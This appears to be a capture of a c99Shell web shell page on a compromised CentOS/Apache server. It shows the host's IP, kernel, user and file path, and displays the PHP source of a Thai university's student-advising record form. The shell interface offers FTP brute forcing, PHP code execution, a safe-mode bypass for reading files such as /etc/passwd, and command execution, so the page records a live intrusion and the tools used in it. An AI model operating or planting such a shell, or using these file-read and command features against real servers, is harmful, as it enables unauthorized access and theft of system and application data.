110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/application/views/esa/ drwxr-xr-x Free 50.65 GB of 127.8 GB (39.63%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<link rel="stylesheet" href="<?=base_url();?>/js/textboxlist_proto/textboxlist.css" type="text/css" media="screen" title="Test Stylesheet" charset="utf-8" />
<script src="<?=base_url();?>/js/textboxlist_proto/protoculous-effects-shrinkvars.js" type="text/javascript" charset="utf-8"></script>
<script src="<?=base_url();?>/js/textboxlist_proto/textboxlist.js" type="text/javascript" charset="utf-8"></script>
<script src="<?=base_url();?>/js/textboxlist_proto/textboxlistauto.js" type="text/javascript" charset="utf-8"></script>
<script type="text/javascript">

document.observe('dom:loaded', function() {
  // init
    tlist1 = new FacebookList('wk11_co', 'wk11_auto');
    var get_user_list_url = "<?=site_url("esa/search/get_std_list")?>";        
  // fetch and feed
    new Ajax.Request(get_user_list_url, {
    onSuccess: function(transport) {
        transport.responseText.evalJSON(true).each(function(t){tlist1.autoFeed(t)});
    }
    });
});


Element.addMethods({
    onBoxDispose: function(item,obj) { obj.autoFeed(item.retrieveData('text')); },
    onInputFocus: function(el,obj) { obj.autoShow(); },    
    onInputBlur: function(el,obj) { 
      obj.lastinput = el;
      obj.blurhide = obj.autoHide.bind(obj).delay(0.1);
    },
    filter:function(D,E){var C=[];for(var B=0,A=this.length;B<A;B++){if(D.call(E,this[B],B,this)){C.push(this[B]);}}return C;}
});

function do_submit2 (action) {
    if (action) {
        jQuery("#myform").attr('action', action);
    }

    var mb_id = jQuery("#mb_id").val();
    if (mb_id == '') {
        tlist1.update();
    }

    jQuery("#myform").submit();
}
</script>
<?php
//    echo "genForm = $genForm <br>";
//    echo "outData = $outData <br>";

    $hr[''] = '';
    for ($i=0;$i<=8;$i++){
        $hr[$i] = $i;
     }
    $mn[''] = '';
    for ($i=0;$i<=59;$i++){
        $mn[$i] = $i;

     }
$total_sec = 0;
$total_min = 0;
$total_hour = 0;
$row_avr = ($qu_avr->num_rows() > 0) ? $qu_avr->row() : NULL;
?>

<?php echo form_open($this->config->item('sa_folder')."adviser_record/insert_adviser", array("name" => "myform", "id" => "myform"));?>
<table width="100%" border='0'>
    <tr>
        <td align="center"><h3>บันทึกประวัติการให้คำปรึกษา</h3></td>
    </tr>
    <tr>
        <td>
            <table class='szone2' width="70%" border="0" > 
                <tr>
                    <th valign="top">นักศึกษาที่ได้รับคำปรึกษา</th>
                    <td id="is_list" class="input-text"><input type = "text" value = "" name="wk11_co" id = "wk11_co" /> <!-- 2. textbox's name & id -->
                            <div id = "wk11_auto"> <!-- 3. div's  id -->
                                <div class = "default">กรุณากรอกชื่อนักศึกษา</div>
                                <ul class = "feed">
        <?php
                            if ($row_avr) {
                                foreach($qu_avr->result() as $row) {
        ?>
                            <li value="<?php echo getval('stdId', $row); ?>"><?php
                            echo getval('stdCode', $row).': '.getval('stdName', $row).' '.getval('stdSurname', $row);
                            ?></li>
        <?php                    }
                            }
        ?>
                                </ul>
                            </div>
                            <?php echo form_error('wk11_co');?>
                    </td>
                </tr>
                <tr>
                    <th valign="top">ประเภท </th>
                    <td align="left"><?php echo form_dropdown('avr_type', $rs_avt, set_value('avr_type',getval('avr_type',$row_avr)));    ?>
             <font color='red'>*</font> <?php echo form_error('avr_type');?></td>
                </tr>
                <tr>
                    <th valign="top">เรื่อง </th>
                    <td align="left"><input type='text' id='avr_title' name='avr_title' size='40' value="<?php echo set_value('avr_title', getval('avr_title', $row_avr));?>"> <font color='red'>*</font> <?php echo form_error('avr_title');?></td>
                </tr>
                <tr>
                    <th valign="top">วันที่ให้คำปรึกษา</th>
                    <td><script>DateInput('avr_date', true, 'DD/MM/YYYY',"<?php echo set_value('avr_date') ? set_value('avr_date') : splitDateDb2(getval('avr_date', $row_avr, getNowDate()), '/');?>");</script>
                    <?php echo form_error('avr_date');?></td>
                </tr>
                <tr>
                    <th valign="top">จำนวนชั่วโมง</th>
                    <td>
            <?php
                $v = explode(":", getval('avr_time', $row_avr));
            ?>
                        <!-- recordTime -->
                        <?=form_dropdown('recordTime_hr', $hr, set_value('recordTime_hr',($row_avr) ? $v[0]:'')); ?> ชั่วโมง 
                        <?=form_dropdown('recordTime_mn', $mn, set_value('recordTime_mn',($row_avr) ? $v[1]:'')); ?> นาที
                        <font color='red'>*</font>
                        <?php echo form_error('recordTime_hr');?>
                    </td>
                </tr>
                <tr>
                    <th valign="top">รายละเอียด</th>
                    <td>
                        <textarea id="avr_detail" name="avr_detail" rows="5" cols="50" value="<?php echo set_value('avr_detail', getval('avr_detail', $row_avr));?>"><?php echo set_value('avr_detail', getval('avr_detail', $row_avr));?></textarea>
                        <?php echo form_error('avr_detail');?>
                    </td>
                </tr>
                <tr>
                    <th valign="top">อาจารย์ที่ให้คำปรึกษา</th>
                    <td>
            <?php
                 $adviser = array(
                          'name'        => 'adviser',
                          'value'       => (set_value('adviser')=="") ? getval('fName', $row_avr).' '.getval('lName', $row_avr) : set_value('adviser'),
                          'maxlength'   => '20',
                          'size'        => '30',
                          'readonly'    => 'yes'
                        );
                //echo form_input($adviser);
                $atts_pop = array(
                          'width'      => '400',
                          'height'     => '500',
                          'scrollbars' => 'yes',
                          'status'     => 'yes',
                          'resizable'  => 'yes',
                          'screenx'    => '0',
                          'screeny'    => '0'
                );
                echo form_hidden('ps_id',getval('avr_prs_id', $row_avr));
                echo form_hidden('ps_code');
                echo anchor_popup('esa/search/searchTeacher', form_input($adviser), $atts_pop);
            ?>
                        <font color='red'>*</font>
                        <?php echo form_error('ps_id');?>
                    </td>
                </tr>
                <tr>
                    <td colspan='2' align='center'>
                    <input type="submit" name="record" value="บันทึก" onclick="javascript:do_submit();">
                    <input type="submit" name="btnCancel" id="btnCancel" value="ยกเลิก" />
                    <input type="hidden" name="persons" id="persons" />
                    <input type="hidden" name="avr_id" id="avr_id" value="<?php echo getval('avr_id',$row_avr)?>"/>
                    <input type="hidden" name="avr_grp" id="avr_grp" value="<?php echo getval('avr_grp',$row_avr)?>"/>
                    </td>
                </tr>
            </table>
        </td>
    </tr>
</table>
<br>
<div align='right'>รหัส/ชื่อ-สกุลนักศึกษา : <input type="text" id="v_search" name="v_search" value="<?=$v_search;?>" /><input type="button" id="btnSearch" name="btnSearch" value="ค้นหา" onClick="do_submit2('<?php echo site_url($this->config->item('sa_folder').'adviser_record/genForm');?>')" /></div>
<br>
<?echo form_close();?>
<?php if($sa_ad->num_rows()){ ?>
        <b>อาจารย์ที่ให้คำปรึกษา</b> <?php echo isset($sa_ad->row()->fName) ? $sa_ad->row()->fName." ".$sa_ad->row()->lName : ''; ?>
        <br>
<?php } ?>
<table class='tb_1' width="100%" border="0">
    <thead>
        <tr>
            <th width='5%'>ครั้งที่</th>
            <th>ประเภท</th>
            <th>เรื่อง</th>
            <!-- <th>ลำดับที่</th> -->
            <th>รหัสนักศึกษา</th>
            <th>ชื่อ - นามสกุล</th>
            <th>วัน/เดือน/ปี</th>
            <th>จำนวนชั่วโมง</th>
            <th width="5%">แก้ไข</th>
            <th width="5%">ลบ</th>
        </tr>
    </thead>
    <tbody>
        <?php
            if (isset($sa_ad) && $sa_ad->num_rows()) {
                $i = 1;
                $b = 0;
                $c = 0;
                $seq = 0;
                $times = 0;
                $total_sec = 0;
                $total_min = 0;
                $total_hour = 0;
                $grp = 0;
                $th = 0;
                $name = '';
                foreach ($sa_ad->result() as $row_ad) { 
                    //print_r($row_ad);
                    if ($th != $row_ad->avr_prs_id && $th != 0) {?>
                        </table>
                        <p align="right"><b>รวม&nbsp;&nbsp;&nbsp;<?php echo isset($b) ? $b : ''; ?>&nbsp;&nbsp;&nbsp;ครั้ง&nbsp;&nbsp;&nbsp;<?php echo isset($i) ? date("H:i:s", mktime($total_hour+0, $total_min+0, $total_sec+0)) : ''; ?>&nbsp;&nbsp;&nbsp;ชั่วโมง</b></p>
                        <br>
                        <b>อาจารย์ที่ให้คำปรึกษา</b> <?php echo isset($row_ad->fName) ? $row_ad->fName." ".$row_ad->lName : '';
                ?>
    <table class='tb_1' width="100%" border="0">

    <thead>
        <tr>
            <th width='5%'>ครั้งที่</th>
            <th>ประเภท</th>
            <th>เรื่อง</th>
            <!-- <th>ลำดับที่</th> -->
            <th>รหัสนักศึกษา</th>
            <th>ชื่อ - นามสกุล</th>
            <th>วัน/เดือน/ปี</th>
            <th>จำนวนชั่วโมง</th>
            <th width="5%">แก้ไข</th>
            <th width="5%">ลบ</th>
        </tr>
    </thead>
    <tbody>
<?php
                        $i = 1;
                        $b = 0;
                        $c = 0;
                        $seq = 0;
                        $times = 0;
                        $total_sec = 0;
                        $total_min = 0;
                        $total_hour = 0;
                        $name = '';
                    }
                    if ($grp != $row_ad->avr_grp) {
                        $b++;
                        list($hour, $min, $sec) = explode(':', $row_ad->avr_time);
                        $total_sec = $total_sec + $sec;
                        $total_min = $total_min + $min;
                        $total_hour = $total_hour + $hour;
                        $name = $row_ad->avr_title;
                        $c++;
                        $seq = $c;
                    }else {
                        $name = '';
                        $seq = '';
                    }
            ?>
                <tr>
                    <td align="center"><?php echo $seq; ?></td>
                    <td width="5%" align="center"><?=$rs_avt[$row_ad->avr_type]; ?></td>
                    <td><span title="<?php echo $row_ad->avr_detail;?>"><?php echo $name; ?></td>
                    <!-- <td width="10%" align="center"><?php echo $i++; ?></td> -->
                    <td width="15%" align="center"><?php echo $row_ad->stdCode; ?></td>
                    <td width="20%" ><?php echo $row_ad->stdName." ".$row_ad->stdSurname; ?></td>
                    <td width="15%" align="center"><?php echo abbreDate(splitDateDb2($row_ad->avr_date)); ?></td>
                    <td width="15%" align="center"><?php echo $row_ad->avr_time; ?></td>
                    <td align="center">
                    <?php if ($grp != $row_ad->avr_grp) {?>
                        <span class="hand" onClick="sendPost('myform', {'avr_grp':<?php echo $row_ad->avr_grp;?>}, 'genForm')"><?php echo img($this->config->item('sa_image_reply'));?></span>
                    <?php }?>
                    </td>
                    <td align="center">
                    <?php if ($grp != $row_ad->avr_grp) {?>
                        <span class="hand" onClick="if (confirm('ต้องการลบใช่หรือไม่')) { sendPost('hidform', {'avr_grp':<?php echo $row_ad->avr_grp;?>}, 'delete_adviser'); }"><?php echo img($this->config->item('sa_image_del'));?></span>
                    <?php }?>
                    </td>
                </tr>
        <?php
                    $grp = $row_ad->avr_grp;
                    $th = $row_ad->avr_prs_id;
                }
            } else { 
        ?>    
                <tr class='notfound'>
                    <td colspan="8" align="center"><?php echo $this->config->item('sa_not_found');?></td>
                </tr>
        <?php
            }
        ?>
    </tbody>
</table>
<?php if($sa_ad->num_rows()){ ?>
<p align="right"><b>รวม&nbsp;&nbsp;&nbsp;<?php echo isset($b) ? $b : ''; ?>&nbsp;&nbsp;&nbsp;ครั้ง&nbsp;&nbsp;&nbsp;<?php echo isset($i) ? date("H:i:s", mktime($total_hour+0, $total_min+0, $total_sec+0)) : ''; ?>&nbsp;&nbsp;&nbsp;ชั่วโมง</b></p>
<?php } ?>
<script language="javascript">
function do_submit(){
    tlist1.update(); 
    document.getElementById('persons').value = $F('wk11_co');
    document.myform.submit();
}
</script>

<br><br><br><br><br>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: